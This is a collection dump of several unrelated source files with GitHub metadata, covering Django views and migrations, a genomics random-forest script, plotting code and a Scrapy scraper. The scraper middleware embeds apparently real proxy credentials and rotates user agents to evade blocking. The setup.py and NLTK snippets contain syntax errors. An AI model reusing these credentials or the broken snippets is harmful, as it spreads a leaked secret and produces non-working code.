if (feature=='nucleus_area'):
feature_name="nucleus area (Micron square)";
elif (feature=='elongation'):
feature_name="elongation (Micron)";
elif (feature=='circularity'):
feature_name="circularity (Micron)";
else:
feature_name = feature;
n=record["hist_count_array"];
bins=record["bin_edges_array"];
print case_id,feature;
total_object_count=0;
for count in n:
total_object_count=total_object_count+ count;
fig, ax = plt.subplots()
# get the corners of the rectangles for the histogram
left = np.array(bins[:-1])
right = np.array(bins[1:])
bottom = np.zeros(len(left))
top = bottom + n
# we need a (numrects x numsides x 2) numpy array for the path helper
# function to build a compound path
XY = np.array([[left, left, right, right], [bottom, top, top, bottom]]).T
# get the Path object
barpath = path.Path.make_compound_path_from_polys(XY)
# make a patch out of it
patch = patches.PathPatch(barpath)
ax.add_patch(patch)
# update the view limits
ax.set_xlim(left[0], right[-1])
ax.set_ylim(bottom.min(), top.max())
plt.xlabel(feature_name)
plt.ylabel('Object Count')
plt.title("Object level "+ feature+ ' Histogram of image '+ str(case_id))
#Tweak spacing to prevent clipping of ylabel
plt.subplots_adjust(left=0.15)
plt.grid(True);
# place a text box in upper left in axes coords
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
textstr="Total object count: " + str(total_object_count);
ax.text(0.6, 0.95, textstr, transform=ax.transAxes, fontsize=10, verticalalignment='top', bbox=props);
#plt.show();
file_name="object_level_histogram_"+case_id+"_"+feature+".png";
graphic_file_path = os.path.join(picture_folder, file_name);
plt.savefig(graphic_file_path);
plt.gcf().clear();
exit();
| [
"noreply@github.com"
] | noreply@github.com |
aa13131b7bd493ba22905c58f1ad26b34fc32637 | 25bd28af726d7301c87b53e2d19aad1158926187 | /contact/views.py | b4ea648dce210daaf84263443533edf8ae8f0947 | [
"Apache-2.0"
] | permissive | SolomonMbak/3_a | e19b064493ebcbe1f323ab5d90d083496e86e2c4 | d5d7656091e866efa2cd5dcc7bd5bc54627ac62a | refs/heads/master | 2022-12-14T13:08:42.211524 | 2021-05-01T19:06:23 | 2021-05-01T19:06:23 | 201,625,462 | 1 | 0 | Apache-2.0 | 2022-12-08T06:00:07 | 2019-08-10T12:13:49 | HTML | UTF-8 | Python | false | false | 1,021 | py | from django.shortcuts import render
from .forms import ContactForm
from django.core.mail import send_mail
from django.contrib import messages
# Create your views here.
def contact(request):
if request.method == "POST":
form = ContactForm(request.POST)
if form.is_valid():
form.save()
messages.info(
request, "Your message has been sent successfully! Expect a response from us as soon as we can.")
email = form.cleaned_data.get('email')
subject = form.cleaned_data.get('subject')
send_mail('Message Recieved!',
'The message you just sent to us has been recieved. Do expect a response from us soon.',
'no-reply@360academia.com', [email], fail_silently=False)
return render(request, "main/index.html")
else:
form = ContactForm()
template = "contact/contact.html"
context = {
"form": form
}
return render(request, template, context)
| [
"solomonmbak@gmail.com"
] | solomonmbak@gmail.com |
35fb6cf8a00471f461fdf814f9244e942862de35 | dd2de4c00369d2f607febac282cc67fe7265b3e1 | /OntoWAS_mixedRF.py | de57f464050953940b73087f57e4f4cf5a002a48 | [] | no_license | hidentanaka/OntoWAS | b61d38775784398aa7dd9c6075c26dee4619d36b | 0fd85a3d6e1a2674dc2bc6b9cc15ef6022daad86 | refs/heads/master | 2023-07-17T16:25:28.607737 | 2021-09-08T07:15:19 | 2021-09-08T07:15:19 | 282,007,991 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,066 | py |
import numpy as np
import pandas as pd
data = np.loadtxt('inputfile_OntoT.csv', delimiter=',', dtype=float)
labels = data[:, 0:1]
features = data[:, 1:]
Z = features
y_conf = labels.ravel()
from sklearn.decomposition import PCA
pca = PCA(n_components=30)
pca.fit(Z)
X = pca.transform(Z)
import scipy as sp
import pylab as pl
get_ipython().run_line_magic('matplotlib', 'inline')
from limix.ensemble.lmm_forest import Forest as LMF
from limix.ensemble import lmm_forest_utils as utils
n_samples=965
x = sp.arange(n_samples).reshape(-1,1)
kernel=utils.getQuadraticKernel(x, d=200) + sp.eye(n_samples)*1e-8
n_samples=965
from sklearn.preprocessing import StandardScaler
stdsc = StandardScaler()
(training, test) = utils.crossValidationScheme(2, n_samples)
x_train_std = stdsc.fit_transform(X[training])
x_test_std = stdsc.transform(X[test])
lm_forest = LMF(kernel=kernel[sp.ix_(training, training)])
lm_forest.fit(x_train_std, y_conf[training])
response_tot = lm_forest.predict(x_test_std, kernel[sp.ix_(test,training)])
random_forest = LMF(kernel='iid')
random_forest.fit(x_train_std, y_conf[training])
response_iid = random_forest.predict(x_test_std)
response_fixed = lm_forest.predict(x_test_std)
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_fixed, 'c-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'mixed RF (fixed effect)', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output1_OntT.pdf')
pp.savefig(fig)
pp.close()
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output2_OntT.pdf')
pp.savefig(fig)
pp.close()
response_tot_train = lm_forest.predict(X[training], kernel[sp.ix_(training,training)])
response_iid_train = random_forest.predict(X[training])
import numpy as np
from sklearn.model_selection import KFold
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor as RFR
import pandas as pd
print('MSE train_mixedRF : %.3f, test_mixedRF : %.3f' % (mean_squared_error(y_conf[training], response_tot_train), mean_squared_error(y_conf[test], response_tot)) )
print('r2 train_mixedRF : %.3f, test_mixedRF : %.3f' % (r2_score(y_conf[training], response_tot_train), r2_score(y_conf[test], response_tot)) )
print('MSE train : %.3f, test : %.3f' % (mean_squared_error(y_conf[training], response_iid_train), mean_squared_error(y_conf[test], response_iid)) )
print('r2 train : %.3f, test : %.3f' % (r2_score(y_conf[training], response_iid_train), r2_score(y_conf[test], response_iid)) )
feature = lm_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output3.csv")
feature = random_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output4.csv")
import numpy as np
import pandas as pd
data = np.loadtxt('inputfile_gene.csv', delimiter=',', dtype=float, skiprows=1)
labels = data[:, 0:1]
features = data[:, 1:]
X = features
y = labels.ravel()
import scipy as sp
import pylab as pl
get_ipython().run_line_magic('matplotlib', 'inline')
from limix.ensemble.lmm_forest import Forest as LMF
from limix.ensemble import lmm_forest_utils as utils
n_samples=965
x = sp.arange(n_samples).reshape(-1,1)
kernel=utils.getQuadraticKernel(x, d=200) + sp.eye(n_samples)*1e-8
n_samples=965
(training, test) = utils.crossValidationScheme(2, n_samples)
lm_forest = LMF(kernel=kernel[sp.ix_(training, training)])
lm_forest.fit(X[training], y_conf[training])
response_tot = lm_forest.predict(X[test], kernel[sp.ix_(test,training)])
random_forest = LMF(kernel='iid')
random_forest.fit(X[training], y_conf[training])
response_iid = random_forest.predict(X[test])
response_fixed = lm_forest.predict(X[test])
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_fixed, 'c-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'mixed RF (fixed effect)', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
# set path
pp = PdfPages('output1_gene.pdf')
pp.savefig(fig)
pp.close()
from matplotlib.backends.backend_pdf import PdfPages
fig = pl.figure()
pl.plot(x, y_conf, '.7')
pl.plot(x[test], response_tot, 'r-.')
pl.plot(x[test], response_iid, 'b-.')
pl.title('prediction')
pl.xlabel('genotype (in decimal encoding)')
pl.ylabel('phenotype')
pl.legend(['fixed effect + confounding',
'mixed RF', 'RF'],
bbox_to_anchor=(1.2, 1.4), ncol=2)
pl.show()
pp = PdfPages('output2_gene.pdf')
pp.savefig(fig)
pp.close()
response_tot_train = lm_forest.predict(X[training], kernel[sp.ix_(training,training)])
response_iid_train = random_forest.predict(X[training])
import numpy as np
from sklearn.model_selection import KFold
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor as RFR
import pandas as pd
print('MSE train_mixedRF : %.3f, test_mixedRF : %.3f' % (mean_squared_error(y_conf[training], response_tot_train), mean_squared_error(y_conf[test], response_tot)) )
print('r2 train_mixedRF : %.3f, test_mixedRF : %.3f' % (r2_score(y_conf[training], response_tot_train), r2_score(y_conf[test], response_tot)) )
print('MSE train : %.3f, test : %.3f' % (mean_squared_error(y_conf[training], response_iid_train), mean_squared_error(y_conf[test], response_iid)) )
print('r2 train : %.3f, test : %.3f' % (r2_score(y_conf[training], response_iid_train), r2_score(y_conf[test], response_iid)) )
feature = lm_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output3_gene.csv")
feature = random_forest.log_importance
f = pd.DataFrame({'number': range(0, len(feature)),'feature': feature[:]})
f2 = f.sort_values('feature',ascending=False)
pd.set_option('display.max_rows', 1000)
print(f2)
f2.to_csv("output4_gene.csv")
| [
"haru.manna.2788g@gmail.com"
] | haru.manna.2788g@gmail.com |
bc88ee008ef6e29c1e09c23ca4d023b13f41c158 | 92c97577d7a411b933d852a700cba4b01a58c73a | /storage.py | 56cdd902ff4030edfc9b187218ac61e47d29679f | [] | no_license | alex-ac/ldjam | 71c91b2da87e420ff59d3ffa25c02550fee46f55 | f5b7e3c5f7d2ce6a9f069c8dd85aefa23dea25c2 | refs/heads/master | 2020-09-24T02:12:57.348943 | 2016-08-29T14:34:15 | 2016-08-29T14:34:15 | 66,726,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | import yaml
class Storage(object):
def __init__(self, last_update_id=None):
self.last_update_id = None
@classmethod
def load(cls, data):
return cls(**yaml.load(data))
def save(self):
return yaml.dump({
'last_update_id': self.last_update_id,
})
| [
"alex-ac@yandex-team.ru"
] | alex-ac@yandex-team.ru |
fa15303b08005facb3b231c2858e8ec9ba6c6a6b | 1e3a7750cc352060c9583daecf4358064df17e13 | /config.py | 04fb40826ae09c396aa2ce0733bbe0b67e4ac7e4 | [] | no_license | IronButterfly/nlpsysscripts | aa335a4a26733d8e10cce27f9cb64a18ef6b94bd | ccbe9f2bb2408aabb97cf3c72c541a6fd7562b41 | refs/heads/master | 2021-05-11T05:16:28.901829 | 2018-01-18T09:18:37 | 2018-01-18T09:18:37 | 117,957,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | consumer_key = ""
consumer_secret = ""
access_token = ""
access_token_secret = ""
Google_API = ""
AWS_ACCESS_KEY = ''
AWS_SECRET_ACCESS_KEY =''
| [
"noreply@github.com"
] | noreply@github.com |
fa79b596babef682f3b5914ffcc30d799205917c | 726ce8dddbb12af1662e002633bfe538ddf77708 | /PyOpenGL-2.0.2.01-py2.5-win32.egg/OpenGL/GL/SGIS/_multitexture.py | f56fd6209fbb3f8208e4edbfaed99bcb96da0c30 | [] | no_license | bopopescu/BCPy2000-1 | f9264bb020ba734be0bcc8e8173d2746b0f17eeb | 0f877075a846d17e7593222628e9fe49ab863039 | refs/heads/master | 2022-11-26T07:58:03.493727 | 2019-06-02T20:25:58 | 2019-06-02T20:25:58 | 282,195,357 | 0 | 0 | null | 2020-07-24T10:52:24 | 2020-07-24T10:52:24 | null | UTF-8 | Python | false | false | 284 | py | def __bootstrap__():
global __bootstrap__, __loader__, __file__
import sys, pkg_resources, imp
__file__ = pkg_resources.resource_filename(__name__,'_multitexture.pyd')
__loader__ = None; del __bootstrap__, __loader__
imp.load_dynamic(__name__,__file__)
__bootstrap__()
| [
"vanessa_kamara@my.uri.edu"
] | vanessa_kamara@my.uri.edu |
e4b13c967146163781fa18667db1e794d99cbd16 | 2967b898cc18f8011fa692f5ef49914f1fb02787 | /Lesson1/task7.py | 5c1845cbe4ba6399f821ee825cd344fb0142a6c9 | [] | no_license | EATataris/Python_Algorithms | 107a944282703766e9d929ea209d408f0102ba6b | 903f58159f8b0deb85b0cde1d1b1ce64e9b807c7 | refs/heads/main | 2023-03-28T02:20:54.915122 | 2021-03-16T17:09:10 | 2021-03-16T17:09:10 | 337,175,443 | 0 | 0 | null | 2021-03-16T17:09:11 | 2021-02-08T18:46:36 | Python | UTF-8 | Python | false | false | 1,613 | py | """
Задание 7.
Задание на закрепление навыков работы с деком
В рассмотренном на уроке листинге есть один недостаток
Приведенный код способен "обработать" только строку без пробелов, например, 'топот'
Но могут быть и такие палиндромы, как 'молоко делили ледоколом'
Вам нужно доработать программу так, чтобы она могла выполнить проверку на палиндром
и в таких строках (включающих пробелы)
"""
class DequeClass:
def __init__(self):
self.elems = []
def is_empty(self):
return self.elems == []
def add_to_front(self, elem):
self.elems.append(elem)
def add_to_rear(self, elem):
self.elems.insert(0, elem)
def remove_from_front(self):
return self.elems.pop()
def remove_from_rear(self):
return self.elems.pop(0)
def size(self):
return len(self.elems)
def pal_checker(string):
dc_obj = DequeClass()
for el in string.replace(' ', ''):
dc_obj.add_to_rear(el)
still_equal = True
while dc_obj.size() > 1 and still_equal:
first = dc_obj.remove_from_front()
last = dc_obj.remove_from_rear()
if first != last:
still_equal = False
return still_equal
print(pal_checker("топот"))
print(pal_checker("молоко делили ледоколом"))
| [
"emir-ali818@mail.ru"
] | emir-ali818@mail.ru |
d24af5aaad0fb6661854bcd9bfba843ba4aa8b38 | e2e454a3a10253e9b9647342b9a2c23685ca776f | /Django/Nexquality/migrations/0003_auto_20150324_1533.py | 293121ec24d5389b746a25da61a3f17eb64c6905 | [] | no_license | hboisselle/Nexquality-project | 728b6330e26f9c51b66af1467c8ab4295f4dac87 | 56e09388fd81a6256951a0d79d2ac3a5e023a5ac | refs/heads/master | 2021-01-10T18:46:31.441355 | 2015-04-08T13:44:33 | 2015-04-08T13:44:33 | 32,348,766 | 0 | 0 | null | 2015-05-01T14:37:49 | 2015-03-16T19:46:05 | Python | UTF-8 | Python | false | false | 1,107 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('Nexquality', '0002_auto_20150324_0951'),
]
operations = [
migrations.RemoveField(
model_name='projectuser',
name='joined_date',
),
migrations.AddField(
model_name='projectuser',
name='in_date',
field=models.DateField(default=datetime.datetime(2015, 3, 24, 19, 33, 51, 251805, tzinfo=utc)),
preserve_default=True,
),
migrations.AddField(
model_name='projectuser',
name='out_date',
field=models.DateField(null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='project',
name='start_date',
field=models.DateField(default=datetime.datetime(2015, 3, 24, 19, 33, 51, 250782, tzinfo=utc)),
preserve_default=True,
),
]
| [
"hugo.boisselle@gmail.com"
] | hugo.boisselle@gmail.com |
8e43d738be53b7f0e9be55751e8679abda1a206e | 4042cdc0abc903bfa6775af3a0ddc5e42059d7b7 | /DynamicProgramming/746. Min Cost Climbing Stairs.py | 599f8f7eb764ce121b044948a1a1c41b01d01045 | [] | no_license | adongxu/leetcode | 1b9fd77ebbe608e1fe19272a4fb7ec669a6d95b0 | 53857b3f54f42a1c1c13986a96537252bc97a4e2 | refs/heads/master | 2020-05-03T15:19:25.480537 | 2019-04-10T11:46:40 | 2019-04-10T11:46:40 | 178,702,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | """
746. Min Cost Climbing Stairs
Easy
On a staircase, the i-th step has some non-negative cost cost[i] assigned (0 indexed).
Once you pay the cost, you can either climb one or two steps. You need to find minimum cost to reach
the top of the floor, and you can either start from the step with index 0, or the step with index 1.
Example 1:
Input: cost = [10, 15, 20]
Output: 15
Explanation: Cheapest is start on cost[1], pay that cost and go to the top.
Example 2:
Input: cost = [1, 100, 1, 1, 1, 100, 1, 1, 100, 1]
Output: 6
Explanation: Cheapest is start on cost[0], and only step on 1s, skipping cost[3].
Note:
cost will have a length in the range [2, 1000].
Every cost[i] will be an integer in the range [0, 999].
"""
class Solution:
def minCostClimbingStairs(self, cost):
# 从2开始,累加最小的值
for i in range(2, len(cost)):
cost[i] += min(cost[i-1], cost[i-2])
# 最后一步可能从N-1或者n-2上去
return min(cost[-1], cost[-2])
# s= Solution()
# print(s.minCostClimbingStairs([1, 100, 1, 1, 1, 100, 1, 1, 100, 1])) | [
"1940240498@qq.com"
] | 1940240498@qq.com |
a2b0d9876b409aa030d60fd036b25a4a456322eb | 6bfda75657070e177fa620a43c917096cbd3c550 | /kubernetes/client/models/v1_quobyte_volume_source.py | c6a908ad799fb3900dd6206276075c0813fbba3b | [
"Apache-2.0"
] | permissive | don41382/client-python | 8e7e747a62f9f4fc0402eea1a877eab1bb80ab36 | e69d4fe204b98f7d7ee3ada3996b4f5fbceae5fe | refs/heads/master | 2021-01-19T23:15:50.172933 | 2017-04-18T18:00:48 | 2017-04-18T18:00:48 | 88,943,866 | 0 | 0 | null | 2017-04-21T05:19:52 | 2017-04-21T05:19:52 | null | UTF-8 | Python | false | false | 6,504 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1QuobyteVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, group=None, read_only=None, registry=None, user=None, volume=None):
"""
V1QuobyteVolumeSource - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'group': 'str',
'read_only': 'bool',
'registry': 'str',
'user': 'str',
'volume': 'str'
}
self.attribute_map = {
'group': 'group',
'read_only': 'readOnly',
'registry': 'registry',
'user': 'user',
'volume': 'volume'
}
self._group = group
self._read_only = read_only
self._registry = registry
self._user = user
self._volume = volume
@property
def group(self):
"""
Gets the group of this V1QuobyteVolumeSource.
Group to map volume access to Default is no group
:return: The group of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._group
@group.setter
def group(self, group):
"""
Sets the group of this V1QuobyteVolumeSource.
Group to map volume access to Default is no group
:param group: The group of this V1QuobyteVolumeSource.
:type: str
"""
self._group = group
@property
def read_only(self):
"""
Gets the read_only of this V1QuobyteVolumeSource.
ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false.
:return: The read_only of this V1QuobyteVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1QuobyteVolumeSource.
ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false.
:param read_only: The read_only of this V1QuobyteVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def registry(self):
"""
Gets the registry of this V1QuobyteVolumeSource.
Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes
:return: The registry of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._registry
@registry.setter
def registry(self, registry):
"""
Sets the registry of this V1QuobyteVolumeSource.
Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes
:param registry: The registry of this V1QuobyteVolumeSource.
:type: str
"""
if registry is None:
raise ValueError("Invalid value for `registry`, must not be `None`")
self._registry = registry
@property
def user(self):
"""
Gets the user of this V1QuobyteVolumeSource.
User to map volume access to Defaults to serivceaccount user
:return: The user of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._user
@user.setter
def user(self, user):
"""
Sets the user of this V1QuobyteVolumeSource.
User to map volume access to Defaults to serivceaccount user
:param user: The user of this V1QuobyteVolumeSource.
:type: str
"""
self._user = user
@property
def volume(self):
"""
Gets the volume of this V1QuobyteVolumeSource.
Volume is a string that references an already created Quobyte volume by name.
:return: The volume of this V1QuobyteVolumeSource.
:rtype: str
"""
return self._volume
@volume.setter
def volume(self, volume):
"""
Sets the volume of this V1QuobyteVolumeSource.
Volume is a string that references an already created Quobyte volume by name.
:param volume: The volume of this V1QuobyteVolumeSource.
:type: str
"""
if volume is None:
raise ValueError("Invalid value for `volume`, must not be `None`")
self._volume = volume
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"mehdy@google.com"
] | mehdy@google.com |
bbfc2f22e37ac6ad2ddccc7df2a64d1d0416ba61 | b81e6271fd8fcf8696c90383d4358862da287ebf | /setup.py | 506c00fb603e59453072db52b0c92920987a20a3 | [
"MIT"
] | permissive | PandeKalyani95/Wafer_Project | 20d3aac9ad9585b07fffa0520f70d90b164f8dab | 915d8febca6107019866a0d63963aa66bf478526 | refs/heads/main | 2023-04-07T11:48:47.394335 | 2021-04-13T11:31:46 | 2021-04-13T11:31:46 | 357,197,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='It's a wafer Ml project using mlops',
author='Kalyani0395',
license='MIT',
)
| [
"kalyanipande95@gmail.com"
] | kalyanipande95@gmail.com |
2467704279934bd40ea505eb40107f96ac59b745 | 1648f1205dad75927dc7b3be58d8c1ce947b5dcf | /blog/migrations/0002_auto_20180113_1737.py | 2127c0a5d4b1a5ed42ae1ec1ec394c27ddab9803 | [
"MIT"
] | permissive | rapacheco/blog | 8efcbc8199d157a4450945261694f2065c864bc6 | 1875ac22faf25834ccb8f233470efa96acd06a67 | refs/heads/master | 2020-03-18T04:47:50.718923 | 2018-05-21T18:11:47 | 2018-05-21T18:11:47 | 134,306,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-13 22:37
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='create_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 13, 22, 37, 34, 618974, tzinfo=utc)),
),
migrations.AlterField(
model_name='post',
name='create_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 13, 22, 37, 34, 617470, tzinfo=utc)),
),
]
| [
"rapachecobeiro@hotmail.com"
] | rapachecobeiro@hotmail.com |
b2ab8d47998ea4e78f6b52de16d4b8b57ba4020a | cd052f960846ea33e22abdded3106fb492f16c31 | /爬虫项目/code11/Tencent/Tencent/middlewares.py | f313fa007a063eec3e1f4f43302226f7dbe1aa01 | [] | no_license | byst4nder/his_spider | 2d96457b70894c36506e8061d8a3201ac337a5d0 | a51e31acff41292e568ac22b0e213e6cb48218fa | refs/heads/master | 2020-07-21T12:06:28.952083 | 2019-09-06T14:25:58 | 2019-09-06T14:25:58 | 206,857,595 | 1 | 0 | null | 2019-09-06T19:04:02 | 2019-09-06T19:04:02 | null | UTF-8 | Python | false | false | 1,284 | py | #coding:utf-8
import random
import requests
from fake_useragent import UserAgent
from settings import USER_AGENT_LIST
class RandomUserAgentMiddleware(object):
def __init__(self):
self.ua_obj = UserAgent()
def process_request(self, request, spider):
#user_agent = random.choice(USER_AGENT_LIST)
user_agent = self.ua_obj.random
request.headers["User-Agent"] = user_agent
print('---' * 10)
print(request.headers)
# 在中间件里不需要写return操作
# return request
class RandomProxyMiddleware(object):
def __init__(self):
self.proxy_url = "http://kps.kdlapi.com/api/getkps/?orderid=914194268627142&num=1&pt=1&sep=1"
# 获取代理服务器里提供的proxy
self.proxy_list = [requests.get(self.proxy_url).content]
self.count = 0
def process_request(self, request, spider):
if self.count < 20:
proxy = random.choice(self.proxy_list)
#http://47.99.65.91:16818
# http://maozhaojun:ntkn0npx@47.99.65.91:16818
request.meta['proxy'] = "http://maozhaojun:ntkn0npx@" + proxy
self.count += 1
else:
self.proxy_list = [requests.get(self.proxy_url).content]
self.count = 0
| [
"mac@macdeMacBook-Pro.local"
] | mac@macdeMacBook-Pro.local |
b212ce15f5e798b7aacdaec1a2404adcfb12f4cf | 1ea7ef2dd05a6cdee070af9f801ec5c2e4637dd0 | /Python/audioPassEnergy.py | 7b63a5b5c1ab516d66b8f847377e3aa939c4f86e | [] | no_license | qdbethune/pi_bois | 841557d72c9fe876167351be4ee4ad45253c3b60 | 10c05985794aa6befaf483b182b3d3b2dba18ca5 | refs/heads/master | 2020-04-01T03:40:18.728398 | 2018-10-14T13:28:10 | 2018-10-14T13:28:10 | 152,831,368 | 0 | 2 | null | 2018-10-13T17:31:13 | 2018-10-13T03:29:25 | C++ | UTF-8 | Python | false | false | 2,824 | py |
import essentia
from essentia.streaming import *
def audioPassEnergy ():
"""Program to test the various audio processing capabilities of Essentia"""
# Load audio in mono using MonoLoader default parameters
print("Enter input audio file path:")
loader = MonoLoader(filename=input())
# Cuts audio into discrete frames
lowCutter = FrameCutter(frameSize = 1024, hopSize = 512)
lowmidCutter = FrameCutter(frameSize = 1024, hopSize = 512)
highmidCutter = FrameCutter(frameSize = 1024, hopSize = 512)
highCutter = FrameCutter(frameSize = 1024, hopSize = 512)
# Low Pass filter (cutoff > 256hz)
lowFilter = LowPass(cutoffFrequency= 256)
# Low-Mid Pass filter (256 - 1024hz)
lowmidFilter = BandPass(cutoffFrequency= 256, bandwidth=768)
# High-Mid Pass filter (1024 - 4096hz)
highmidFilter = BandPass(cutoffFrequency= 1024, bandwidth=3072)
# High Pass filter (cutoff < 4096hz)
highFilter = HighPass(cutoffFrequency= 4096)
# Fast Fourier Transform Magnitudes
lowSpec = Spectrum()
lowmidSpec = Spectrum()
highmidSpec = Spectrum()
highSpec = Spectrum()
# Energy value
lowEnergy = Energy()
lowmidEnergy = Energy()
highmidEnergy = Energy()
highEnergy = Energy()
# Files for data output
lowout = FileOutput(filename = './Evalues/lowOutput')
lowmidout = FileOutput(filename = './Evalues/lowmidOutput')
highmidout = FileOutput(filename = './Evalues/highmidOutput')
highout = FileOutput(filename = './Evalues/highOutput')
# Duration of audio file in seconds
duration = Duration()
durationOut = FileOutput(filename= './Evalues/fileDuration')
loader.audio >> duration.signal
duration.duration >> durationOut
# Data flow to low filter
loader.audio >> lowFilter.signal
lowFilter.signal >> lowCutter.signal
lowCutter.frame >> lowSpec.frame
lowSpec.spectrum >> lowEnergy.array
lowEnergy.energy >> lowout
# Data flow to lowmid filter
loader.audio >> lowmidFilter.signal
lowmidFilter.signal >> lowmidCutter.signal
lowmidCutter.frame >> lowmidSpec.frame
lowmidSpec.spectrum >> lowmidEnergy.array
lowmidEnergy.energy >> lowmidout
# Data flow to highmid filter
loader.audio >> highmidFilter.signal
highmidFilter.signal >> highmidCutter.signal
highmidCutter.frame >> highmidSpec.frame
highmidSpec.spectrum >> highmidEnergy.array
highmidEnergy.energy >> highmidout
# Data flow to high filter
loader.audio >> highFilter.signal
highFilter.signal >> highCutter.signal
highCutter.frame >> highSpec.frame
highSpec.spectrum >> highEnergy.array
highEnergy.energy >> highout
# Run statement
essentia.run(loader)
def main():
audioPassEnergy()
if __name__ == "__main__":
main()
| [
"quentindbethune@gmail.com"
] | quentindbethune@gmail.com |
e2cf1b3f98dfcce63fb6f90e285c8220d9b48cf1 | c9f3c9c40a903ff3cfba533e993305a21fb9d058 | /Module 1/Chapter 1/nltk_scoring.py | 2e6e6afe187e2316ba3cc22d19e32890379b5a34 | [
"MIT"
] | permissive | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | 628e8ae954ce8ca135c1d8bc7bfbd70c53485cc1 | b34df3ceab78b3de29195a811696dcd06e77063a | refs/heads/master | 2023-02-05T15:17:55.574854 | 2023-01-30T09:56:54 | 2023-01-30T09:56:54 | 73,365,954 | 59 | 45 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | >>>import sys
>>>import datetime
>>>import pickle
>>>import nltk
>>>nltk.download('punkt')
>>>for line in sys.stdin:
>>> line = line.strip()
>>> id, content= line.split('\t')
>>> tokens =nltk.word_tokenize(concat_all_text)
>>> print '\t'.join([id,content,tokens])
| [
"eganl@packtpub.com"
] | eganl@packtpub.com |
